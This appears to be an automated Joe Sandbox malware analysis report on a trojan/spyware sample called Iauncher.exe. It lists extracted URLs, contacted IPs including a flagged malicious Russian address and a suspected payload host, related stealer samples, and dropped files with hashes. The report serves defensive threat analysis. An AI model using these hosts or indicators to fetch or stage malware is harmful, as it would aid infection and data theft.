                                                                                                          http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.founder.com.cn/cn/bTheIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id3ResponseDRegAsm.exe, 00000004.00000002.1979402537.000000000284F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/DRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/06/addressingexRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.typography.netDIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.fonts.comIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.sandoll.co.krIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id13ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://antiloxss.usite.pro/STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txtt-Iauncher.exe, 00000000.00000002.3509420380.00000000029F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://antiloxss.usite.proIauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegAsm.exe, 00000004.00000002.1979402537.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.1979402537.0000000002D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.siticoneframework.com/pricing.htmlFSoftwareIauncher.exe, 00000000.00000002.3509420380.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://antiloxss.usite.prodIauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policyRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://tempuri.org/Entity/Id22ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/IssueRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlNIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.founder.com.cn/cnIauncher.exe, 00000000.00000002.3518252135.0000000006F52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scRegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://tempuri.org/Entity/Id18ResponseRegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          147.45.47.65
                                                                                                                                                                          unknownRussian Federation
                                                                                                                                                                          2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                          104.21.44.179
                                                                                                                                                                          gitgo.orgUnited States
                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                          193.109.246.100
                                                                                                                                                                          antiloxss.usite.proVirgin Islands (BRITISH)
                                                                                                                                                                          204343COMPUBYTE-ASRUfalse
                                                                                                                                                                          142.251.163.113
                                                                                                                                                                          google.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                          Analysis ID:1434866
                                                                                                                                                                          Start date and time:2024-05-01 20:45:13 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 8m 28s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:Iauncher.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal96.troj.spyw.evad.winEXE@6/7@3/4
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 97%
                                                                                                                                                                          • Number of executed functions: 187
                                                                                                                                                                          • Number of non-executed functions: 54
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                          • VT rate limit hit for: Iauncher.exe
                                                                                                                                                                          No simulations
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          193.109.246.100Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            No context
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            COMPUBYTE-ASRUUndetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            T4IoJqcAwY.exeGet hashmaliciousNymaim, SmokeLoader, Zealer Stealer, onlyLoggerBrowse
                                                                                                                                                                            • 193.109.246.62
                                                                                                                                                                            https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 193.109.247.233
                                                                                                                                                                            njw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 193.109.247.229
                                                                                                                                                                            CLOUDFLARENETUStZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                            • 172.67.151.19
                                                                                                                                                                            Sean Eichler.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.16.117.116
                                                                                                                                                                            https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.16.103.112
                                                                                                                                                                            [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                                            • 104.21.73.118
                                                                                                                                                                            https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.2.184
                                                                                                                                                                            https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                            https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.2.184
                                                                                                                                                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                                                                                                            • 172.66.0.163
                                                                                                                                                                            https://2625819278.org/MIg2p2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                            FREE-NET-ASFREEnetEUtZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                            • 193.233.132.226
                                                                                                                                                                            2zdult23rz.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                            • 147.45.47.93
                                                                                                                                                                            file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                            • 147.45.47.93
                                                                                                                                                                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                                            • 193.233.132.175
                                                                                                                                                                            fBirvIlaOJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                            • 147.45.47.36
                                                                                                                                                                            VOrqSh1Fts.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                                                                                                                                                            • 193.233.132.234
                                                                                                                                                                            WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                                                                                                            • 147.45.47.93
                                                                                                                                                                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                                                                            • 193.233.132.47
                                                                                                                                                                            file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                            • 147.45.47.93
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eLuminar_v4.0.1.htaGet hashmaliciousCobalt Strike, Atlantida StealerBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            [V2]launcher.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            Hola-Browser-Setup-C-Mmd1.exeGet hashmaliciousPureLog Stealer, SilentXMRMiner, XmrigBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            0ED4nPDjeo.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            Dy4Oz8C1yF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            KG8KxoD6n4.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            twkBksZzkc.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            Agreement.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            uF8wwjO0iU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                            • 104.21.44.179
                                                                                                                                                                            • 193.109.246.100
                                                                                                                                                                            No context
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:28 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2104
                                                                                                                                                                            Entropy (8bit):3.456324608366694
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:8SkudZTBnGRYrnvPdAKRkdAGdAKRFdAKR/U:8SvZ
                                                                                                                                                                            MD5:76FE8DA04758158775318A14A428F45E
                                                                                                                                                                            SHA1:4FD7FF194FBE1EA13EAAA3C84B89417C752CA6FC
                                                                                                                                                                            SHA-256:1B4FF0DCAC573DB025FE338BE53B8DF0BB5A72534269698C22DC48600C7D7C4A
                                                                                                                                                                            SHA-512:C65FF550B8DC8C2E63239388DDD842501EB104EB0117E9894FDEB6A99C9567078E220FFF7A72EE09B086C30AA9FEDA2155ABF6EF9A07570D34A3358D42B031A7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:L..................F.@.. ......,...............q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW5`....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWO`....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWO`....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWO`..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWI`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3274
                                                                                                                                                                            Entropy (8bit):5.3318368586986695
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                                                                                                                            MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                                                            SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                                                            SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                                                            SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2662
                                                                                                                                                                            Entropy (8bit):7.8230547059446645
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                                            MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                            SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                            SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                            SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2662
                                                                                                                                                                            Entropy (8bit):7.8230547059446645
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                                            MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                            SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                            SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                            SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                            Process:C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):505344
                                                                                                                                                                            Entropy (8bit):7.675139785236683
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:L4J4ZH65jJTA3St/9q8OH0UXHyo1wLnWXT23i5gk5EDuSXRa:E4ZGTtt/Y8cfh1wLn4T23i52B
                                                                                                                                                                            MD5:D79977A15EB010C637CF9078B4EB82C8
                                                                                                                                                                            SHA1:AE5672620C42C4BA2C2B8BD5B8FB3AD519C252B1
                                                                                                                                                                            SHA-256:3F5012D3CFFBD993BFEFEAFC606D343BDC2A2E74B3A01A7DA4F3D31F601FB5DD
